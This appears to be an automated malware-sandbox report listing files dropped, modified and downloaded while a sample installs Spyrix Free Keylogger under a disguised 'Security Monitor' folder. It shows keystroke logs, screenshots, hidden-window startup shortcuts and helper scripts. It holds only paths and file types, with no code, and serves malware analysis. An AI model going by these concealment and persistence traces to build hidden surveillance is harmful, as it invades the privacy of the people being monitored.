C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\logo.png (copy)
|
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\main.ico (copy)
|
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel,
-128x-128, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\offer.url (copy)
|
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with
CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.cmd (copy)
|
ASCII text, with very long lines (382), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sgw.m (copy)
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data,
big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision
8, 320x240, components 3
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Air.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Android.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Charm.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Default.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\HUD.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\SnowLeopard.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Ubuntu.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Win8.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\iOS4.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-14PI3.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-7NBNM.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-A0DCJ.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-D2UD1.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-EN2GR.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-M51F4.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-N0C51.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-QU5RS.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-T980U.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spyrix.url (copy)
|
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF
line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-1NSV6.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-BMRGT.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-Q435M.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-3J8FI.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-8CR71.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-CDKF2.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\tmain.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.dat
|
InnoSetup Log Spyrix Free Keylogger 11.6.22, version 0x418, 231569 bytes, 138727\37\user\376, C:\ProgramData\Security Monitor\{827D21CC-
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\45567.log
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb
|
SQLite 3.x database, last written using SQLite version 3013000, file counter 15, database pages 4, cookie 0x2, schema 4, UTF-8,
version-valid-for 15
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb-journal
|
SQLite Rollback Journal
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\logs.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0081654051.jpg
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1036x957, components
3
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0082075116.jpg
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 891x487, components
3
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0083452199.jpg
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x1024, components
3
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\scr\scr.dat
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\desktop\Spyrix Free Keylogger.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0,
Archive, ctime=Wed Oct 2 03:11:11 2024, mtime=Wed Oct 2 03:11:22 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini
|
Generic INItialization configuration [System]
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-1TFQ0.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-A80FN.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-IKLRH.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-5G3KA.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-QU7U6.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-VCGQQ.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\runprg.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\start\Spyrix Free Keylogger.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0,
Archive, ctime=Wed Oct 2 03:11:11 2024, mtime=Wed Oct 2 03:11:12 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\start\Uninstall Spyrix Free Keylogger.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive,
ctime=Wed Oct 2 03:11:10 2024, mtime=Wed Oct 2 03:11:10 2024, atime=Wed Oct 2 03:10:34 2024, length=1308909, window=hide
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_StartButton_EE7E4705DD4AC06ADFE650C2CDC39BDD
|
ASCII text, with very long lines (425), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD
|
ASCII text, with very long lines (419), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Run_First_EE7E4705DD4AC06ADFE650C2CDC39BDD
|
ASCII text, with very long lines (412), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Show_EE7E4705DD4AC06ADFE650C2CDC39BDD
|
ASCII text, with very long lines (408), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_wizard_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD
|
ASCII text, with very long lines (416), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb
|
SQLite 3.x database, last written using SQLite version 3013000, file counter 10, database pages 4, cookie 0x2, schema 4, UTF-8,
version-valid-for 10
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb-journal
|
SQLite Rollback Journal
|
dropped
|
||
C:\ProgramData\{972DC8CA-126D-23FD-11AA-92876DD12AFD}\5913A2D6482586A397876746C6020FBE
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\[space]= .exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\REG7F99.tmp
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\REGCB67.tmp
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05ubxjdy.kxy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0x34pnkz.zgz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xtf2sp3.mwx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0z2f0ucl.cl3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21yamr1d.idj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25b3wzjk.hhd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ofq5iwo.ejb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3drj5blw.cey.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_422j5yu0.wqv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42s2nobh.duz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xqutnav.0t2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52b1a2ao.bth.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xdsznc4.iyx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1ogi30j.txr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adg5l4y5.0at.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcqbbkqb.kqb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdunmr4b.n0g.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebovtinq.epj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egin1fc4.ywe.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffxidwzf.xpo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvuq5nfy.c5c.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g20nlqcv.lmk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbsvjqxx.1nl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1gbx5gu.ja2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3zss5pf.q4e.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iugvvcmp.sh5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jjwafj51.1nk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jjwznhhs.q32.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krbawg1r.aau.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqa00r32.ph5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnkhwsiw.fro.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnlmhvdk.tl2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npbsign0.q1l.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obvvy3rw.bwf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocgxn2kf.vnn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oguz5xdg.nbw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pb5lws0y.hxq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfxs025v.n4p.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rogkn3sf.n5u.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trdvw34i.laf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txnentbw.wom.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueehqv15.4cl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2rpwjs5.25n.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xb5ihyto.be5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbtnkbqn.dtc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxbbhgn3.4dg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxb54v4g.on4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzwrdkxj.gn2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\eb90c874-90f1-477e-bf8d-92cb4599bdb5.cmd
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\l
|
ASCII text, with no line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\stld2.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\stld3.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\$ywr34c.tmp
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_iscrypt.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_isdecmp.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_setup64.tmp
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\iMsgInfo.bmp
|
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\psout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\psout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\pswd.cmd
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\sout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\sout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\spmmout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\spmmout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\spsout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\spsout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\webbrowser.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nse
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\sfkname.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tpl556z6i5ctbzg
|
ASCII text, with very long lines (835), with CRLF line terminators
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
Chrome Cache Entry: 622
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
|
downloaded
|
||
Chrome Cache Entry: 623
|
Java source, ASCII text, with very long lines (1184)
|
downloaded
|
||
Chrome Cache Entry: 624
|
Java source, ASCII text, with very long lines (3701)
|
dropped
|
||
Chrome Cache Entry: 625
|
Java source, ASCII text, with very long lines (1184)
|
dropped
|
||
Chrome Cache Entry: 626
|
Java source, ASCII text, with very long lines (522)
|
downloaded
|
||
Chrome Cache Entry: 627
|
ASCII text
|
dropped
|
||
Chrome Cache Entry: 628
|
Java source, ASCII text, with very long lines (612)
|
dropped
|
||
Chrome Cache Entry: 629
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 630
|
ASCII text, with very long lines (2465)
|
downloaded
|
||
Chrome Cache Entry: 631
|
ASCII text, with very long lines (773)
|
downloaded
|
||
Chrome Cache Entry: 632
|
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
Chrome Cache Entry: 633
|
Java source, ASCII text, with very long lines (3701)
|
downloaded
|
||
Chrome Cache Entry: 634
|
ASCII text, with very long lines (628)
|
dropped
|
||
Chrome Cache Entry: 635
|
Java source, ASCII text, with very long lines (612)
|
downloaded
|
||
Chrome Cache Entry: 636
|
ASCII text, with very long lines (1097)
|
dropped
|
||
Chrome Cache Entry: 637
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
|
dropped
|
||
Chrome Cache Entry: 638
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 639
|
Java source, ASCII text, with very long lines (4588)
|
dropped
|
||
Chrome Cache Entry: 640
|
Java source, ASCII text, with very long lines (795)
|
dropped
|
||
Chrome Cache Entry: 641
|
Java source, ASCII text, with very long lines (4588)
|
downloaded
|
||
Chrome Cache Entry: 642
|
Java source, ASCII text, with very long lines (1391)
|
dropped
|
||
Chrome Cache Entry: 643
|
ASCII text, with very long lines (773)
|
dropped
|
||
Chrome Cache Entry: 644
|
Java source, Unicode text, UTF-8 text, with very long lines (731)
|
downloaded
|
||
Chrome Cache Entry: 645
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
|
downloaded
|
||
Chrome Cache Entry: 646
|
ASCII text, with very long lines (1512)
|
downloaded
|
||
Chrome Cache Entry: 647
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 648
|
ASCII text, with very long lines (3064)
|
downloaded
|
||
Chrome Cache Entry: 649
|
Java source, ASCII text, with very long lines (522)
|
dropped
|
||
Chrome Cache Entry: 650
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 651
|
C++ source, Unicode text, UTF-8 text
|
downloaded
|
||
Chrome Cache Entry: 652
|
ASCII text, with very long lines (5945)
|
dropped
|
||
Chrome Cache Entry: 653
|
Java source, ASCII text, with very long lines (837)
|
dropped
|
||
Chrome Cache Entry: 654
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 61324
|
downloaded
|
||
Chrome Cache Entry: 655
|
Java source, Unicode text, UTF-8 text, with very long lines (731)
|
dropped
|
||
Chrome Cache Entry: 656
|
ASCII text, with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 657
|
Web Open Font Format (Version 2), TrueType, length 44112, version 1.0
|
downloaded
|
||
Chrome Cache Entry: 658
|
Web Open Font Format (Version 2), TrueType, length 43608, version 1.0
|
downloaded
|
||
Chrome Cache Entry: 659
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 660
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
|
dropped
|
||
Chrome Cache Entry: 661
|
ASCII text
|
dropped
|
||
Chrome Cache Entry: 662
|
ASCII text, with very long lines (628)
|
downloaded
|
||
Chrome Cache Entry: 663
|
ASCII text, with very long lines (1097)
|
downloaded
|
||
Chrome Cache Entry: 664
|
HTML document, ASCII text
|
downloaded
|
||
Chrome Cache Entry: 665
|
